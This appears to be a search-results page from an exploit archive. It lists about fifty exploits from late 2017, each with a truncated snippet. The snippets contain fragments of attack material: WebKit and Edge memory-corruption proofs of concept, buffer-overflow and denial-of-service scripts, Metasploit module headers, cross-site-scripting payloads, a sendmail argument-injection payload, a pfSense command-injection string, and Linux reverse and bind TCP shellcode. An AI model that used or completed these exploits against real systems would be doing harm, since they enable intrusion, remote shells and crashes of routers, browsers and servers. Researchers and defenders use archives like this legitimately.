47885 matches found
WebKit - 'WebCore::AXObjectCache::performDeferredCacheUpdate' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1347 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac...
Winamp Pro 5.66.Build.3512 - Denial of Service
!/usr/bin/perl Exploit Title: Winamp Pro .wav|.wmv|.au|.asf|.aiff|.aif Denial of Service Date: 2017-11-22 Exploit Author: R.Yavari Version: v5.66.Build.3512 Tested on: Windows 10 , Windows 7 other version should be affected CVE-2017-16951 http://meggamusic.co.uk/winamp/winamp5666fullen-usredux.ex...
WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free
.class9 column-span: all; function f document.execCommand"indent", false; var var00031 = window.getSelection.setBaseAndExtentsum,16,null,6; f; !-- ================================================================= ASan log: =================================================================...
WebKit - 'WebCore::RenderText::localCaretRect' Out-of-Bounds Read
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1348 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / max-height: 0;...
WebKit - 'WebCore::InputType::element' Use-After-Free (2)
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1345 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function go...
WebKit - 'WebCore::TreeScope::documentScope' Use-After-Free
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1344 There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / function freememory var a;...
WebKit - 'WebCore::Style::TreeResolver::styleForElement' Use-After-Free
function eventhandler1 try txt.appendChildkg; catche function eventhandler2 try anim.appendChildkg; catche function eventhandler3 try table.scrollIntoViewtrue; catche a !-- ================================================================= ASan log:...
KMPlayer 4.2.2.4 - Denial of Service
!/usr/bin/perl Exploit Title: KMPlayer .nsv Denial of Service Date: 2017-11-22 Exploit Author: R.Yavari Version: v4.2.2.4 Tested on: Windows 10 , Windows 7 other version should be affected NSV is Streaming video container format developed by Nullsoft; used for streaming video clips over the...
WebKit - 'WebCore::SVGPatternElement::collectPatternAttributes' Out-of-Bounds Read
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1350 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / /...
WebKit - 'WebCore::FormSubmission::create' Use-After-Free
function jsfuzzer textarea1.setRangeText"foo"; textarea2.autofocus = true; textarea1.name = "foo"; form.insertBeforetextarea2, form.firstChild; form.submit; function eventhandler2 forvar i=0;i a b !-- ================================================================= ASan log:...
WebKit - 'WebCore::DocumentLoader::frameLoader' Use-After-Free
function go iframe.name = "foo"; var form = document.createElement"form"; iframe.src = "data:text/html,foo"; form.submit; window.onbeforeunload = f; function f document.head.appendChilddel; ::get /Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x8664+0x45a...
WebKit - 'WebCore::SimpleLineLayout::RunResolver::runForPoint' Out-of-Bounds Read
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1349 There is an out-of-bounds read security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly. PoC: ================================================================= / border-bottom: green...
Vonage VDV-23 - Denial of Service
Overview During an evaluation of the Vonage home phone router, it was identified that the loginUsername and loginPassword parameters were vulnerable to a buffer overflow. This overflow caused the router to crash and reboot. Further analysis will be performed to find out if the the crash is...
Microsoft Windows 10 - 'nt!NtQueryDirectoryFile (luafv!LuafvCopyDirectoryEntry)' Pool Memory Disclosure
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1361 We have discovered that the nt!NtQueryDirectoryFile system call discloses portions of uninitialized pool memory to user-mode clients on Windows 10, due to uninitialized fields in the output structure being copied to the...
DblTek - Multiple Vulnerabilities
Vulnerabilities summary The following advisory describes 2 two vulnerabilities found in DblTek webserver. DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 1...
Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1332 Windows: CiSetFileCache TOCTOU Security Feature Bypass Platform: Windows 10 10586/14393/10S not tested 8.1 Update 2 or Windows 7 Class: Security Feature Bypass Summary: It’s possible to add a cached signing level to an unsigne...
Microsoft Office - OLE Remote Code Execution
Source: https://github.com/embedi/CVE-2017-11882 CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882 Research:...
iOS < 11.1 / tvOS < 11.1 / watchOS < 4.1 - Denial of Service
Exploit Title: TpwnT - iOS Denail of Service POC Date: 10-31-2017 Exploit Author: Russian Otter Ro Vendor Homepage: https://support.apple.com/en-us/HT208222 Version: 2.1 Tested on: iOS 10.3.2 - 11.1 CVE: CVE-2017-13849 """ ------------------------- CVE-2017-13849 TpwnT by Ro of SavSec...
Icon Time Systems RTC-1000 Firmware 2.5.7458 - Cross-Site Scripting
Exploit Title: Icon Time Systems RTC-1000 alert"xss"; ========================================================== PROOF OF CONCEPT - With valid credentials that has permissions to modify the employee records, access the employeelist.html page via Lists-Employees...
Microsoft Edge Chakra: JIT - 'OP_Memset' Type Confusion
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1357 function opta, b, v if b.length b0 = ; return 0; ; printb0; main;...
TP-Link TL-WR740N - Cross-Site Scripting
Exploit Title: XSS Vuln - TP-LINK TL-WR740N Date: 15/11/2017 Exploit Author: bl00dy Vendor Homepage: http://www.tp-link.com Version: TP-LINK TL-WR740N - 3.17.0 Build 140520 Rel.75075n Tested on: Windows 8.1 Cross-site scripting XSS in TP-LINK TL-WR740N Proof of Concept: 1. Go to your wireless...
Microsoft Edge Chakra: JIT - 'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1343 Here's a snippet of the method. void Lowerer::LowerBoundCheckIR::Instr const instr ... ifrightOpnd-IsIntConstOpnd IntConstType newOffset; if!IntConstMath::Addoffset, rightOpnd-AsIntConstOpnd-GetValue, &newOffset --- a offset...
Microsoft Edge Chakra JIT - Type Confusion with switch Statements
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1341&desc=3 Let's start with a switch statement and its IR code for JIT. JS: for let i = 0; i ; 100; i++ switch i case 2: case 4: case 6: case 8: case 10: case 12: case 14: case 16: case 18: case 20: case 22: case 24: case 26: ca...
VX Search 10.2.14 - 'Proxy' Local Buffer Overflow (SEH)
!/usr/bin/env python Exploit Title : VXSearch v10.2.14 Local SEH Overflow Date : 11/16/2017 Exploit Author : wetw0rk Vendor Homepage : http://www.flexense.com/ Software link : http://www.vxsearch.com/setups/vxsearchentsetupv10.2.14.exe Version : 10.2.14 Tested on : Windows 7 x86 Description : VX...
Vonage VDV23 - Cross-Site Scripting
Exploit Title: Vonage Home Router – Stored Xss Date: 16/11/2017 Exploit Author: Nu11By73 Hardware Version: VDV-23: 115 Software Version: 3.2.11-0.9.40 CVE : CVE-2017-16843 NewKeyword Parameter: 1. Login to the router 2. Click advanced setup 3. Click parental controls 4. In the block these keyword...
LanSweeper 6.0.100.75 - Cross-Site Scripting
LanSweeper - Cross Site Scripting and HTMLi Title: Vulnerability in LanSweeper Date: 16-11-2017 Status: Vendor contacted, patch available Author: Miguel Mendez Z Vendor Homepage: http://www.lansweeper.com Version: 6.0.100.75 CVE: CVE-2017-16841 Vulnerability description -------------------------...
Zeta Components Mail 1.8.1 - Remote Code Execution
Vendor: Zeta Components module: Mail, returnPath-email”; If attacker assign email address like: '[email protected] -X/var/www/html/cache/exploit.php' and inject payload in mail body, sendmail will transfer log-X into /var/www/html/cache/exploit.php. The resulting file will contain t...
Microsoft Edge - 'Object.setPrototypeOf' Memory Corruption
,1::FindEntry+0x41: 00007fffe2b7c841 8b0c81 mov ecx,dword ptr rcx+rax4 ds:0000023b4a2ea4c4=???????? 0:015 k Child-SP RetAddr Call Site 00 000000be563fbba0 00007fffe2f52e3e chakra!JsUtil::WeaklyReferencedKeyDictionary,1::FindEntry+0x41 01 000000be563fbbf0 00007fffe2e1f9a4...
CommuniGatePro 6.1.16 - Cross-Site Scripting
Exploit Title: CommuniGatePro webmails Multiple Stored XSS Date: 15/11/2017 Exploit Author: Boumediene KADDOUR Unit: Algerie Telecom R&D Unit Vendor Homepage: https://www.stalker.com/ Software Link: http://www.stalker.com/ paid product Version: 6.1.16 Tested on: production server on crystal, pron...
Dup Scout Enterprise 10.0.18 - 'Login' Remote Buffer Overflow
Tested on Windows 10 x86 The application requires to have the web server enabled. Exploit for older version: https://www.exploit-db.com/exploits/40832/ !/usr/bin/python import socket,os,time,struct,argparse parser = argparse.ArgumentParser parser.addargument'--host', required=True args =...
PSFTPd Windows FTP Server 10.0.4 Build 729 - Log Injection / Use-After-Free
X41 D-Sec GmbH Security Advisory: X41-2017-006 Multiple Vulnerabilities in PSFTPd Windows FTP Server ===================================================== Overview -------- Confirmed Affected Versions: 10.0.4 Build 729 Confirmed Patched Versions: None Vendor: Sergei Pleis Softwareentwicklung Vend...
D-Link DIR-850L - OS Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'openssl' class MetasploitModule 'DIR-850L Unauthenticated OS Command Exec', 'Description' = %q This module leverages an unauthenticated credential disclosure...
D-Link DIR-605L < 2.08 - Denial of Service
Exploit Title: D-Link DIR605L ROUTER=$1 if "$" -ne 1 ; then echo "usage: $0 " exit fi curl http://$ROUTER/Tools/...
Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload
Exploit Title: Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D Date: 2017-06-19 Exploit Author: Omar MEZRAG - 0xFFFFFF / www.realistic-security.com Vendor Homepage: https://www.hanwhasecurity.com Version: Web Viewer 1.0.0.193 on Samsung SRN-1670D Tested on: Web...
Ulterius Server < 1.9.5.0 - Directory Traversal
Exploit Title: Ulterius Server 1.9.5.0 Directory Traversal Arbitrary File Access Date: 11/13/2017 Exploit Author: Rick Osgood Vendor Homepage: https://ulterius.io/ Software Link: https://github.com/Ulterius/server/tree/0e4f2113da287aac88a8b4c5f8364a03685d393d Version: 1.9.5.0 Tested on: Windows...
Kirby CMS < 2.5.7 - Cross-Site Scripting
Exploit Title: KirbyCMS 2.5.7 Stored Cross Site Scripting Vendor Homepage: https://getkirby.com/ Software Link: https://getkirby.com/try Discovered by: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps Platform: PHP CVE:...
IKARUS anti.virus 2.16.7 - 'ntguard_x64' Local Privilege Escalation
/ Exploit Title - IKARUS anti.virus Arbitrary Write Privilege Escalation Date - 13th November 2017 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - https://www.ikarussecurity.com/ Tested Version - 2.16.7 Driver Version - 0.18780.0.0 - ntguardx64.sys Tested on OS - 64bit Windows 7 and...
MyBB 1.8.13 - Remote Code Execution
Exploit Title: RCE in MyBB up to 1.8.13 via installer Date: Found on 05-29-2017 Exploit Author: Pablo Sacristan Vendor Homepage: https://mybb.com/ Version: Version 1.8.13 Fixed in 1.8.13 CVE : CVE-2017-16780 This RCE can be executed via CSRF but doesn't require it in some special cases. The...
Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (104 bytes)
Linux/x64 - Reverse TCP 127.0.0.1:4444/TCP Shell /bin/sh + Password 1234567 Shellcode 104 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq...
osCommerce 2.3.4.1 - Arbitrary File Upload
Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload Date: 11.11.2017 Exploit Author: Simon Scannell - https://scannell-infosec.net Vendor Homepage: https://www.oscommerce.com/ Software Link: https://www.oscommerce.com/Products&Download=oscom234 Version: 2.3.4.1, 2.3.4 - Other...
MyBB 1.8.13 - Cross-Site Scripting
Exploit Title: XSS in MyBB up to 1.8.13 via installer Date: Found on 05-29-2017 Exploit Author: Pablo Sacristan Vendor Homepage: https://mybb.com/ Version: Version 1.8.13 Fixed in 1.8.13 CVE : CVE-2017-16781 No HTML escaping when returning an $error in /install/index.php can lead to an XSS which...
Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt + ISR: ApparitionSec Vendor: ======= www.symantec.com Product: =========== Symantec Endpoint...
Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)
Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...
Microsoft Internet Explorer 11 - 'jscript!JsErrorToString' Use-After-Free
var e = new Error; var o = toString:function //alert'in toString'; e.name = 1; CollectGarbage; //reallocate forvar i=0;i !-- ========================================= This is a use-after-free in jscript!JsErrorToString that can lead to a heap overflow. The PoC above crashes in memcpy when...
Mako Server 2.5 - OS Command Injection Remote Command Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mako Server v2.5 OS Command Injection RCE', 'Description' = %q This module exploits a vulnerability found in Mako Server v2.5. It's possible to...
PHP 7.1.8 - Heap Buffer Overflow
Description: ------------ A heap out-of-bound read vulnerability in timelibmeridian can be triggered via wddxdeserialize or other vectors that call into this function on untrusted inputs. $ /php-7.1.8/sapi/cli/php --version PHP 7.1.8 cli built: Aug 9 2017 21:42:13 NTS Copyright c 1997-2017 The PH...
Ametys CMS 4.0.2 - Password Reset
Vulnerability Summary The following advisory describes a password reset vulnerability found in Ametys CMS version 4.0.2 Ametys is “a free and open source content management system CMS written in Java. It is based on JSR-170 for content storage, Open Social for gadget rendering and a XML oriented...
Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)
!/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: Xlight FTP Server x86/x64 - Buffer Overflow Crash PoC Date: 07-11-2017 Vulnerable Software: Xlight FTP Server v3.8.8.5 x86/x64 Vendor Homepage: http://www.xlightftpd.com/ Version: v3.8.8.5 x86/x64 Software Link:...
ManageEngine Applications Manager 13 - SQL Injection
ManageEngine Applications Manager version 13 suffers from multiple post-authentication SQL injection vulnerabilities. Proof of Concept 1 name= parameter is susceptible: POST /manageApplications.do?method=insert HTTP/1.1 Host: 192.168.1.190:9090 User-Agent: Mozilla/5.0 Windows NT 10.0; WOW64;...
pfSense 2.3.1_1 - Command Execution
Exploit Title: pfSense User Manager--Groups in the handling of the members parameter. This allows an authenticated WebGUI user with privileges for systemgroupmanager.php to execute commands in the context of the root user. 2. Proof of Concept 'ifconfig/usr/local/www/ifconfig.txt'...